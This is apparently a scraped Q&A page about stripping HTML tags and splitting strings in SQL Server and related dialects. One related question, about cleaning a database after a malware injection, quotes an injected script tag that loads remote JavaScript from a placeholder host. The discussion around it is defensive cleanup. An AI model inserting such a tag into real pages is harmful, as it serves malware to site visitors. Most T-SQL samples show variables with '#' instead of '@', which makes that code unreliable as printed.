Replace the multiple values between 2 characters in azure sql - sql

In Azure SQL, I'm attempting to delete any text that is present between the < and > characters to my column in my table
Sample text:
The best part is that. < br >Note:< br >< u> reading
:< /u> < span style="font-family: calibri,sans-serif; font-size: 11pt;"> moral stories from an early age
< b>not only helps your child.< /b>< br>< u>in
learning important: < /u>< /span>< span style="font-family: calibri;
">life lessons but it also helps, in language development.< /span>< ./span>
Output:
The best part is that. reading: moral stories from an early age not only helps your child in learning important: life lessons but it also helps in language development.
I tried below query its working only for small comments text:
SELECT [Comments],REPLACE([Comments], SUBSTRING([Comments], CHARINDEX('<', [Comments]), CHARINDEX('>', [Comments]) - CHARINDEX('<', [Comments]) + 1),'') AS result
FROM table

I have taken input table named check_1 and sample data is inserted into that table.
This query removes only the first occurring pattern.
SELECT [Comments],REPLACE([Comments], SUBSTRING([Comments], CHARINDEX('<', [Comments]), CHARINDEX('>', [Comments]) - CHARINDEX('<', [Comments]) + 1),'') AS result
FROM check_1
In order to remove all string patterns beginning with '<' and ending with '>' in the text, a user defined function with a while loop is created.
CREATE FUNCTION [dbo].[udf_removetags] (#input_text VARCHAR(MAX)) RETURNS VARCHAR(MAX)
AS
BEGIN
DECLARE #pos_1 INT
DECLARE #pos_n INT
DECLARE #Length INT
SET #pos_1 = CHARINDEX('<',#input_text)
SET #pos_n = CHARINDEX('>',#input_text,CHARINDEX('<',#input_text))
SET #Length = (#pos_n - #pos_1) + 1
WHILE #pos_1 > 0 AND #pos_n > 0 AND #Length > 0
BEGIN
SET #input_text = replace(#input_text,substring(#input_text,#pos_1,#Length),'')
SET #pos_1 = CHARINDEX('<',#input_text)
SET #pos_n = CHARINDEX('>',#input_text,CHARINDEX('<',#input_text))
SET #Length = (#pos_n - #pos_1) + 1
END
RETURN #input_text
END
select [dbo].[udf_removetags](comments) as result from check_1
Output String:
The best part is that. Note: reading : moral stories from an early age not only helps your child.in learning important: life lessons but it also helps, in language development.
You can also use Stuff [Refer Microsoft document on STUFF] in place of replace+substring function.
Replace this SET #input_text = replace(#input_text,substring(#input_text,#pos_1,#Length),'')
line with the line
SET #input_text = STUFF(#input_text,#pos_1,#Length,'')
in the user defined function.
Result will be same.

According to https://learn.microsoft.com/../azure/../regexp_replace Azure supports REGEXP_REPLACE.
This means it should be possible to replace all '<...>' by '' via
select regexp_replace(comments, '<[^>]*>', '') from mytable;

Related

Sparx EA Heatmap: Combine none or multiple results from a selects subquery into a single comma-separated value

I'm using Sparx EA 14.x with the file based repository, and moving into SQL server based soon. Currently creating some base template level model, to be used later with real customer data with SQL server based repository.
I have created Tagged Values (type=RefGUIDList) for e.g. adding relation into existing Bus.Processes in my data elemets. The list of existing business processes can be selected and their .ea_guid is stored in the tagged value as value.
I have created an HeatMap chart, with attached sql.
The sql works fine if the tagged value has only one business process selected, the problem is that if I add more processes there is no results.
SELECT (SELECT t_object.Name FROM t_object
WHERE t_object.ea_guid = tv.Value) AS Series,
t_object.Alias AS GroupName, Packages.Name
FROM t_object,
t_package RootPackage,
t_package Packages,
t_objectproperties tv
WHERE RootPackage.Name = 'Data elements' AND
Packages.Parent_ID = RootPackage.Package_ID AND
t_object.Package_ID = Packages.Package_ID AND
t_object.Object_ID = tv.Object_ID AND
tv.Property = 'APM:Prosesses'
One solution, that I have been looking, would be to concatenate the listed Bus.processes names and show the result.
I'm aware that the SQL server dialect is different than the current Access based repository.
The problem was that the Sparx t_objectproperties.ea_guid was stored in several times into t_objectproperties.Value and I did need the corresponding t_object.Name as comma concatenated.
In my case worked a solution, where I 1st moved the repository into SQL server based repository and did create a function like below:
CREATE FUNCTION fnSplitString
(
#string NVARCHAR(1000),
#delimiter CHAR(1)
)
RETURNS VARCHAR(1000) AS
BEGIN
DECLARE #csvObjectname VARCHAR(1000)
DECLARE #start INT, #end INT
SELECT #start = 1, #end = CHARINDEX(#delimiter, #string)
WHILE #start < LEN(#string) + 1 BEGIN
IF #end = 0
SET #end = LEN(#string) + 1
SELECT #csvObjectname = COALESCE(#csvObjectname + ', ', '') +
COALESCE(t_Object.Name,'')
FROM t_Object
WHERE t_Object.ea_guid = SUBSTRING(#string, #start, #end - #start)
SET #start = #end + 1
SET #end = CHARINDEX(#delimiter, #string, #start)
END
RETURN #csvObjectname
END

How to split a column by the number of white spaces in it with SQL?

I've got a single column that contains a set of names in it. I didn't design the database so that it contains multiple values in one column, but as it is I've got to extract that information now.
The problem is that in one field I've got multiple values like in this example:
"Jack Tom Larry Stan Kenny"
So the first three should be one group, and the other ones on the far right are another group. (Basically the only thing that separates them in the column is a specific number of whitespace between them, let's say 50 characters.)
How can I split them in pure SQL, so that I can get two columns like this:
column1 "Jack Tom Larry"
column2 "Stan Kenny"
A fairly simplistic answer would be to use a combination of left(), right() and locate(). Something like this (note I've substituted 50 spaces with "XXX" for readability):
declare global temporary table session.x(a varchar(100))
on commit preserve rows with norecovery;
insert into session.x values('Jack Tom LarryXXXStan Kenny');
select left(a,locate(a,'XXX')-1),right(a,length(a)+1-(locate(a,'XXX')+length('XXX'))) from session.x;
If you need a more general method of extracting the nth field from a string with a given separator, a bit like the split_part() function in PostgreSQL, in Ingres your options would be:
Write a user defined function using the Object Management Extension (OME). This isn't entirely straightforward but there is an excellent example in the wiki pages of Actian's community site to get you started:
http://community.actian.com/wiki/OME:_User_Defined_Functions
Create a row-producing procedure. A bit more clunky to use than an OME function, but much easier to implement. Here's my attempt at such a procedure, not terribly well tested but it should serve as an example. You may need to adjust the widths of the input and output strings:
create procedure split
(
inval = varchar(200) not null,
sep = varchar(50) not null,
n = integer not null
)
result row r(x varchar(200)) =
declare tno = integer not null;
srch = integer not null;
ptr = integer not null;
resval = varchar(50);
begin
tno = 1;
srch = 1;
ptr = 1;
while (:srch <= length(:inval))
do
while (substr(:inval, :srch, length(:sep)) != :sep
and :srch <= length(:inval))
do
srch = :srch + 1;
endwhile;
if (:tno = :n)
then
resval=substr(:inval, :ptr, :srch - :ptr);
return row(:resval);
return;
endif;
srch = :srch + length(:sep);
ptr = :srch;
tno = :tno + 1;
endwhile;
return row('');
end;
select s.x from session.x t, split(t.a,'XXX',2) s;

Substring from right by character SQL

I have a string(s)-
CO_CS_SV_Integrate_WP_BalancingCostRiskandComplexityinYourDRStrat_Apr-Jun
Or
CO_CS_SV_CommVaultTapSponsorship_WP_GartnerNewsletterSmartIdeaforBigData_Jan-Mar
Or
CO_CS_IA_eMedia_WP_Top5eDiscoveryChallengesSolved_Apr-Jun
I need to get the asset name associated with the campaign which is in the campaign name.
So for example "Balancing Cost Risk and Complexity in Your DR Strat"
would be the asset associated with the first campaign-
"CO_CS_SV_Integrate_WP_BalancingCostRiskandComplexityinYourDRStrat_Apr-Jun"
That is my goal. I want to get just that from the string ("Balancing Cost Risk and Complexity in Your DR Strat".
But I don't see how to strip out the asset from the campaign name. It is not consistent on position or anything else???
I think I can go from the right and and find the second "_"
But I don't know the syntax. I get as far as -
select campaign.name
,Right (campaign.name, charindex('_', REVERSE(campaign.name))) as Test
from campaign
which gives me -
_Apr-Jun
Any help or direction would be greatly appreciated
Thanks.
You could create a scalar function that accept the string, like the following:
CREATE FUNCTION myFunction
(
#str varchar(300)
)
RETURNS varchar(300)
AS
BEGIN
declare #reverse varchar(200),#idx1 int,#idx2 int
set #reverse = reverse(#str)
set #idx1 = CHARINDEX('_',#reverse)
set #idx2 = CHARINDEX('_',#reverse,#idx1+1)
return reverse(substring(#reverse,#idx1+1,#idx2-#idx1-1))
END
You can try with the following example:
select dbo.myFunction('CO_CS_SV_Integrate_WP_BalancingCostRiskandComplexityinYourDRStrat_Apr-Jun');

how to strip all html tags and special characters from string using sql server

I work as asp.net developer using C#, I receive text like this from the client:
> <p><a
> href="http://www.vogue.co.uk/person/kate-winslet">KATE
> WINSLET</a>&nbsp;has given birth to a 9lb baby boy. The
> Oscar-winning actress welcomed the baby with her husband Ned Rocknroll
> at a hospital in Sussex.</p>
>
> <p>&quot;Kate had &#39;Baby Boy Winslet&#39; on
> Saturday at an NHS Hospital,&quot; Winslet&#39;s spokeswoman
> said, adding that the family were &quot;thrilled to
> bits&quot;.</p>
>
> <p>The announcement suggests that the child might bear his
> mother&#39;s surname, rather than his father&#39;s slightly
> more unusual moniker.</p>
>
> <p>The baby is Winslet&#39;s third - she is already mother
> to Mia, 13, and Joe, eight, &nbsp;from previous relationships -
> and her husband&#39;s first. They met on Necker Island, owned by
> Rocknroll&#39;s uncle, Richard Branson, and<a
> href="http://www.vogue.co.uk/news/2013/kate-winslet-married-to-ned-rocknroller---wedding-details">married almost a year ago</a>&nbsp;in New York.</p>
I need a way to extract the real text without tags and special characters using sql server 2008 or above ??
The best I can suggest is to use a .net HTML parser or such which is wrapped in a SQL CLR function. Or to wrap the regex in SQL CLR if you want.
Note regex limitations: http://www.codinghorror.com/blog/2008/06/regular-expressions-now-you-have-two-problems.html
Raw SQL language won't do it: it is not a string (or HTML) processing language
I recently had the same requirement (to remove HTML tags and entities) so developed this function in SQL Server.
CREATE FUNCTION CTU_FN_StripHTML (#dirtyText NVARCHAR(MAX))
RETURNS NVARCHAR(MAX)
AS
BEGIN
-- Cleaned Text
DECLARE #cleanText NVARCHAR(MAX)=RTRIM(LTRIM(#dirtyText));
-- HTML Tags
DECLARE #tagStart SMALLINT =PATINDEX('%<%>%', #cleanText);
DECLARE #tagEnd SMALLINT;
DECLARE #tagLength SMALLINT;
-- HTML Entities
DECLARE #entityStart SMALLINT =PATINDEX('%&%;%', #cleanText);
DECLARE #entityEnd SMALLINT;
DECLARE #entityLength SMALLINT;
WHILE #tagStart > 0
OR
#entityStart > 0
BEGIN
-- Remove HTML Tag
SET #tagStart=PATINDEX('%<%>%', #cleanText);
IF #tagStart > 0
BEGIN
SET #tagEnd=CHARINDEX('>', #cleanText, #tagStart);
SET #tagLength=(#tagEnd - #tagStart) + 1;
SET #cleanText=STUFF(#cleanText, #tagStart, #tagLength, '');
END;
-- Remove HTML Entity
SET #entityStart=PATINDEX('%&%;%', #cleanText);
IF #entityStart > 0
BEGIN
SET #entityEnd=CHARINDEX(';', #cleanText, #entityStart);
SET #entityLength=(#entityEnd - #entityStart) + 1;
SET #cleanText=STUFF(#cleanText, #entityStart, #entityLength, '');
END;
END;
SET #cleanText = RTRIM(LTRIM(#cleanText))
RETURN #cleanText;
END;
HTML is so complex it's a very bad idea to do this without an HTML Parser.
You might be interested in This Question.
The answer that's accepted there is to just use Lynx via the command line and dump the output to a file.
If you can do it outside the users page-load it might be the best option.

Not able to remove injected script from database rows

I've been handed a MS SQL 2000 database which has been injected with malware.
The malware script is as follows:
<script src=http://www.someAddress.ru/aScript.js></script>
Now I want to remove this piece of code from the table rows.
As a test, I inputed < h1> Test < /h1> on a row, and successfully ran the following query:
UPDATE myTable
SET description = REPLACE (description, '<h1>','')
WHERE id = 2;
This removed the h1 tag.
But trying the same with the script tag does not work:
UPDATE myTable
set description = REPLACE (description, '<script src=http://www.someAddress.ru/aScript.js></script>','')
WHERE id = 2
Why does this not work?
UPDATE 2
WOHO! I found the solution!
I'm using the folloing code, which I found here: http://www.tek-tips.com/viewthread.cfm?qid=1563568&page=3
-- Look for open and close HTML tags making sure a letter or / follows < ensuring its an opening
-- HTML tag or closing HTML tag and not an unencoded < symbol
CREATE FUNCTION [dbo].[udf_StripHTML]
(#HTMLText VARCHAR(8000))
RETURNS VARCHAR(8000)
AS
BEGIN
DECLARE #Start INT
DECLARE #End INT
DECLARE #Length INT
SET #Start = CHARINDEX('<',#HTMLText)
SET #End = CHARINDEX('>',#HTMLText,CHARINDEX('<',#HTMLText))
SET #Length = (#End - #Start) + 1
WHILE #Start > 0
AND #End > 0
AND #Length > 0
BEGIN
SET #HTMLText = STUFF(#HTMLText,#Start,#Length,'')
SET #Start = CHARINDEX('<',#HTMLText)
SET #End = CHARINDEX('>',#HTMLText,CHARINDEX('<',#HTMLText))
SET #Length = (#End - #Start) + 1
END
RETURN Replace(LTRIM(RTRIM(#HTMLText)),' ',' ')
END
GO
To remove the HTML tags / scripts, I run the following query:
UPDATE mytable
SET description = [dbo].[udf_StripHTML](description)
//WHERE id = 35;
This works perfectly. Note that this script removes ALL html. So if I only want to remove < script> , I just replace '<' with '< script'.
Have you tried looking for just aScript.js, the entry could be url_encoded, or something similar, so it gives something like
%3Cscript+src%3Dhttp%3A%2F%2Fwww.someAddress.ru%2FaScript.js%3E%3C%2Fscript%3E
Reread Question
Do you mean that even when you have the script tag in a column with id=2 it doesn't work? Because if its not working are you sure that it exists in row with id=2? :p
Should work, unless there are other hidden characters in there you can't see, or there is some form of encoding going on. Can you SELECT a suspect row to look at more closely.
I would tend to completely DELETE FROM myTable WHERE description LIKE '%someAddress.ru%' where possible.
However, fixing the database isn't a real solution; the application must be fixed. It shouldn't ever be echoing text out of the database unencoded. If someone enters some data including the string <script> it should simply appear on the page as the literal string <script>, or in the source <script>.
Wouldn't the src attribute value be surrounded by quotes? If so, you would have to escape them to get a proper match on the replace.
Why not try:
UPDATE myTable
set description = REPLACE (description, 'www.someAddress.ru','localhost')
WHERE id = 2
That would eliminate the immediate hijacking problem, and would likely avoid line break / funky characters problems.
You could try the following to strip the code out of your field (I'm assuming you have information in the same field that you want to keep):
update myTable
set description = case when PATINDEX('%<script%', notes) > 0
then SUBSTRING(notes, 1, PATINDEX('%<script%', notes)-1) + SUBSTRING(notes, PATINDEX('%script>%', notes) + 7, LEN(notes))
else notes
end
where id=2
You could first run a select to see if the value returned by the CASE statement is correct before running the update. It should not affect fields without a script tag in them, though.
Hold on...
Is the database related to a financial system? Is the application under Sarbanes-Oxley? Has any fraud been committed?
Any of those things preclude you from making changes that would, "destroy evidence." Those little guys running around with "FBI" on their jackets don't take kindly to that. It would be a good thing to back it up now, and the logs (SQL and Web), and put that backup on a few DVDs. It would be better to remove the disk and put in another one (but that may not be an option).
Moving on to cleansing:
bobince's direction is the correct one. Don't look for the whole SCRIPT tag, or try to find variations. Instead, look for something in the script tag that isn't part of the normal dataset. That's what you key off. If it SELECTs okay, then turn it into a DELETE and save that query, because you will need it while you turn to fixing the application (guaranteed your database will get corrupted again).